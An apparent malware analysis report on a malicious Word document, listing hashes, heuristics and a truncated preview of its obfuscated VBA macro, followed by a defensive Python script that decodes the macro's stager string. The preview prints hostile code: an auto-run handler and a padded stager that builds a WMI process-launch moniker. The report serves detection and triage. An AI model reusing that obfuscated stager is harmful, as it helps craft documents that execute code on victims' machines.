Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 585b05b7cdcc1b78…

MALICIOUS

Office (OLE)

Size: 193.7 KB
Created: 2020-08-19 21:31:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 75dad97b1159e6750ebe0bff1a33d72b
SHA-1: 366257b6830608a63198d1868e664ea3dfe47845
SHA-256: 585b05b7cdcc1b787976148634705260c8a3587b39e91e95d0c8ebbf5fcb7015
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-exec handler and a hidden-UserForm command stager, which together indicate malicious intent; the ClamAV detection Doc.Malware.Sagent-9403571-0 corroborates this. The extracted source is padded with junk conditionals (Len() comparisons of fixed strings guarding MsgBox calls) between the lines that do the work. Those lines assemble the command text by concatenating short fragments around a long separator string, with two characters supplied at run time from the UserForm (HelpContextId, and a form property that is not in the preview). Stripping the separator from the visible fragment gives a string of the form winmgmt?:win32_?rocess, the WMI moniker used to create a process through Win32_Process, which is consistent with launching a process via WMI rather than through a direct shell call. The primary function therefore appears to be executing obfuscated VBA that likely downloads and executes a secondary payload; the download stage itself falls outside the truncated preview.

Heuristics (7)

  • ClamAV: Doc.Malware.Sagent-9403571-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-9403571-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro: the handler runs automatically when the document is opened with macros enabled, so it is the entry point for the rest of the chain.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call: instantiates a COM object by ProgID at run time (the usual route from VBA to a shell, WMI or HTTP client). Not conclusive on its own, but it is a core element of the stager shape above.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI that Office writes into documents; it is not contacted at run time and should not be treated as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15341 bytes
SHA-256: 02acc1db2c4fa37db6fc1b6af6686e0f3a4431258401bb6e34f334fb12fc7357

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "A_gft0khts2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Z9mr73gwc6ug8a.M_gscuvkdietfxvevz
End Sub


Attribute VB_Name = "Z9mr73gwc6ug8a"
Attribute VB_Base = "0{EBC107FD-DB16-42DB-BA20-A81B22A24570}{AC968F29-200E-4CE1-B031-C421FEF98F74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function M_gscuvkdietfxvevz()
   Tn83v37dzlbs877ka = "490"
If Len("Vyv6zkj17htyfi1_Jwh_9yc1ugar") = Len("Q7r7x0i7yws68z") + 1 Then End
If Len("Ag5391ty4z8_tefGjsuxgjv33kzSeb0rznnitydhzh201") < Len("Nsjwoe968iagp6zdv") Then
        MsgBox "Abq33a15rqsc65btgs" + "Nx6t5reinijtvx"
        MsgBox ("Xyl21i7vysm6ohe8y")
        MsgBox "Rbjgtwly4mvh" + "Xq_8oiq4hxbhasw1bj"
End If
If Len("Pn9vw2fzpbqtaPqpok1zinqph_s") = Len("S93diwu_6ogj") Then
       MsgBox "A23eb2pbhl2uyo_" + "Ep2yu1eyq36bqu"
       MsgBox ("Drfhxzkfjcc !!!")
       MsgBox "Pauviutz_pw0kxd" + "H8owxlxdsgn37jsv"
End If

Pvgwpf9dz6t4ngr4 = Z9mr73gwc6ug8a.HelpContextId + 50 + 50
   Ihiqcukgbl3 = "758"
If Len("S57f63b34dbri435vJ4dq29hlb2xt29g") = Len("Pqsbowdfiif3ik") + 1 Then End
If Len("Lwr0_2jd09u1lfjneVhmmtg2z0is3qT0h9j0gxlnu") < Len("V74a07brndq") Then
        MsgBox "Bkik4bvgrq_" + "Ymdfeh7_4pm67"
        MsgBox ("Gx2_1ysd6_285j3oxo")
        MsgBox "Lcw38mghrly9oo640p" + "Sl56sdoioxho39"
End If
If Len("L7x66xurb3gbms0r50Rwwieyse4uk8") = Len("Zr0_gdv6g64clcb2pf") Then
       MsgBox "Lxkm5ytgmt3837" + "B7t_l1nks25f4"
       MsgBox ("Lnop7rk1eely8il !!!")
       MsgBox "Ybhb_ghp6ycm3v" + "N1v8gos7oam"
End If

U03so10k56k09a04 = ChrW(Pvgwpf9dz6t4ngr4 + (15))
   W1r45cowf207m = "80"
If Len("Joqvi47i_n1fMt49jhu7snetxnw") = Len("Fa2zhvjusfpox1") + 1 Then End
If Len("Czq8dn4zy3mAlcwqk54n0qo8kiqdEj3ib5grtcold871i") < Len("Ku_e493fic_5") Then
        MsgBox "Jv7wcd4kip02" + "Kb6utgb_bu5cq5r7v"
        MsgBox ("Mz9b2hl4wp0g")
        MsgBox "Anbu2kzt53gl" + "Buwkloxksc6"
End If
If Len("Hyj1vxa6p5zpkP8vy822zf2gmeut6") = Len("Hhhqxp4iffrxi6") Then
       MsgBox "Au52z6fdwvss" + "Gsqlulohcl0s3p3"
       MsgBox ("Hc980mu24gxfew6 !!!")
       MsgBox "Xjay1fd8qa9j" + "G8qormtuwv891tozj"
End If

Us73fr0esajusj58d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + U03so10k56k09a04 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Z9mr73gwc6ug8a.Lvx1_0xpifn7q + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Dhk6mo8sk3ja = "629"
If Len("N586grcb4bfbvdgzv3Miy6ouz7z1i37wud") = Len("Bjkbogmge42") + 1 Then End
If Len("S51awt170slrvIukjqa_gxlrxecRj20v08s2kc6i") < Len("N04ra5386n2") Then
        MsgBox "Ogpu_pxtkjvt_" + "Lct_nf3ednygdi"
        MsgBox ("Uonhko1dhlxhz3k")
        MsgBox "Hrvo1n7_vtqdc" + "Vlp0s6hmza20my29cn"
End If
If Len("Zozt66ptow30walslSkqg93ux2bijyrdkd") = Len("C4udcm519ce9ag") Then
       MsgBox "Dmcn5r90heoke0" + "Wm96otjwhemi5"
       MsgBox ("N4ac6sea9jah5m !!!")
       MsgBox "Rbz2xh4ag37717irid" + "Rlnikqg6oy5hz8"
End If

Cihc5veidv3usj = Dsiiu606aot2n2c0j(Us73fr0esajusj58d)
   Hif19mrs13xk = "253"
If Len("O_ahgzf56eryxzrlrSfg7vwgiwc_itgs9f") = Len("A7fu4mpezcly_hi89") + 1 Then End
If Len("Pypob9dd6xvlRt
... (truncated)
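The stager fragment in the preview (Pvgwpf9dz6t4ngr4, U03so10k56k09a04, Us73fr0esajusj58d) can be replayed without running the macro. The Python below is an added example for this report, not output of the analysis pipeline or of oletools: it replays the plain assignments from an extracted VBA listing, infers the long separator the string is built around, strips it, and reports the indicators that make up the hidden-UserForm command-stager heuristic. SAMPLE_VBA is a constructed excerpt of the preview above with the chaff between the relevant lines left out. It assumes the UserForm's HelpContextId is 0 (the VBA default) and treats any other form property read, such as Lvx1_0xpifn7q, as unknown ('?') unless a value is passed in; the helper Dsiiu606aot2n2c0j that consumes the string is not in the preview, so its call is reported as unresolved rather than guessed.

```python
"""Replay a hidden-UserForm VBA command stager and recover the string it builds.
Added example for this report (stdlib only); not output of the analysis pipeline."""
import re

# Constructed excerpt of the macro preview: the assignments that build the stager
# string plus one line of the Len() chaff. HelpContextId and Lvx1_0xpifn7q are read
# from the UserForm at run time, not from source (assumption: HelpContextId is 0).
SAMPLE_VBA = r'''
Private Sub _
Document_open()
Z9mr73gwc6ug8a.M_gscuvkdietfxvevz
End Sub
Function M_gscuvkdietfxvevz()
   Tn83v37dzlbs877ka = "490"
If Len("Vyv6zkj17htyfi1_Jwh_9yc1ugar") = Len("Q7r7x0i7yws68z") + 1 Then End
Pvgwpf9dz6t4ngr4 = Z9mr73gwc6ug8a.HelpContextId + 50 + 50
U03so10k56k09a04 = ChrW(Pvgwpf9dz6t4ngr4 + (15))
Us73fr0esajusj58d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + U03so10k56k09a04 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Z9mr73gwc6ug8a.Lvx1_0xpifn7q + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
Cihc5veidv3usj = Dsiiu606aot2n2c0j(Us73fr0esajusj58d)
End Function
'''

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|(\d+)|([A-Za-z_][\w.]*)|([+()])|(\s+)')
AUTOEXEC_RE = re.compile(r'\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b', re.I)
CHAFF_RE = re.compile(r'^\s*If Len\("[^"]*"\)\s*[=<>]', re.M)
HIDDEN_PROPS = ("HelpContextId", "ControlTipText", "Tag", "Pages")  # names from the heuristic


class Unresolved(ValueError):
    """A name the listing does not define (e.g. a helper outside the preview)."""


def _tokens(expr):
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError("unexpected text: " + expr[pos:pos + 10])
        pos = m.end()
        if m.group(1) is not None:
            out.append(("str", m.group(1).replace('""', '"')))
        elif m.group(2):
            out.append(("num", int(m.group(2))))
        elif m.group(3):
            out.append(("ident", m.group(3)))
        elif m.group(4):
            out.append(("sym", m.group(4)))
    return out


class _Eval:
    """Evaluates the '+' chains, ChrW() calls and Form.Property reads seen in the sample."""

    def __init__(self, toks, env, hcid, props):
        self.toks, self.env, self.hcid, self.props, self.i = toks, env, hcid, props, 0

    def _next(self):
        if self.i >= len(self.toks):
            raise ValueError("unexpected end of expression")
        self.i += 1
        return self.toks[self.i - 1]

    def _expect(self, sym):
        if self._next() != ("sym", sym):
            raise ValueError("expected " + sym)

    def chain(self):
        val = self.term()
        while self.i < len(self.toks) and self.toks[self.i] == ("sym", "+"):
            self.i += 1
            val = val + self.term()          # VBA '+': numeric add or string concat
        return val

    def term(self):
        kind, val = self._next()
        if kind in ("str", "num"):
            return val
        if kind == "sym" and val == "(":
            inner = self.chain()
            self._expect(")")
            return inner
        if kind == "ident":
            if val.lower() in ("chrw", "chr"):
                self._expect("(")
                code = self.chain()
                self._expect(")")
                return chr(code)
            if "." in val:                   # UserForm property read: value lives in the form stream
                prop = val.split(".", 1)[1]
                return self.hcid if prop == "HelpContextId" else self.props.get(prop, "?")
            if val in self.env:
                return self.env[val]
            raise Unresolved(val)
        raise ValueError("unexpected token " + str(val))


def evaluate_assignments(vba_text, help_context_id=0, hidden_props=None):
    """Replay plain assignments top-down; returns (env, names that could not be resolved)."""
    env, unresolved = {}, []
    for line in vba_text.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        try:
            env[m.group(1)] = _Eval(_tokens(m.group(2)), env, help_context_id,
                                    hidden_props or {}).chain()
        except Unresolved as e:
            unresolved.append(str(e))
        except (ValueError, TypeError):
            pass                             # expression shape this replayer does not model
    return env, unresolved


def infer_separator(s, min_len=8, min_count=3, max_len=64):
    """Most frequent substring of at least min_len chars (longest on ties): the junk
    separator a Split/Join stager removes at run time."""
    best, best_count = "", 0
    for i in range(len(s)):
        for length in range(min_len, min(max_len, len(s) - i) + 1):
            cand = s[i:i + length]
            count = s.count(cand)
            if count < min_count:
                break                        # a longer extension cannot occur more often
            if count > best_count or (count == best_count and length > len(best)):
                best, best_count = cand, count
    return best


def recover_strings(vba_text, help_context_id=0, hidden_props=None):
    """Decoded values of every long separator-padded string the macro assembles."""
    env, _ = evaluate_assignments(vba_text, help_context_id, hidden_props)
    out = []
    for val in env.values():
        if isinstance(val, str) and len(val) >= 40:
            sep = infer_separator(val)
            if sep:
                out.append(val.replace(sep, ""))
    return out


def triage(vba_text, help_context_id=0, hidden_props=None):
    """Indicator set matching the hidden-UserForm command-stager heuristic."""
    _, unresolved = evaluate_assignments(vba_text, help_context_id, hidden_props)
    recovered = recover_strings(vba_text, help_context_id, hidden_props)
    props = [p for p in HIDDEN_PROPS if re.search(r"\." + p + r"\b", vba_text)]
    r = {
        "autoexec": bool(AUTOEXEC_RE.search(vba_text)),
        "hidden_userform_props": props,
        "char_building": bool(re.search(r"\bChrW?\s*\(", vba_text)),
        "split_join": bool(re.search(r"\bSplit\s*\(", vba_text) and re.search(r"\bJoin\s*\(", vba_text)),
        "object_creation": bool(re.search(r"\b(CreateObject|GetObject)\s*\(", vba_text, re.I)),
        "opaque_len_guards": len(CHAFF_RE.findall(vba_text)),
        "unresolved_helpers": sorted(set(unresolved)),
        "recovered": recovered,
    }
    r["wmi_process_moniker"] = any("winmgmt" in s.lower() and "win32_" in s.lower() for s in recovered)
    r["stager_shape"] = r["autoexec"] and bool(props) and (r["char_building"] or r["split_join"] or bool(recovered))
    return r


if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print(f"{k}: {v}")
```

With the default assumptions the recovered string is winmgmts:win32_?rocess; supplying hidden_props={"Lvx1_0xpifn7q": "P"} completes it to winmgmts:win32_Process, the reading consistent with a WMI Win32_Process launch. The real value of that property, and of HelpContextId, must be taken from the UserForm stream of the sample (olevba or oledump will dump it) rather than assumed, and the Split/Join helper should be confirmed in the full source before the decoding is recorded as fact.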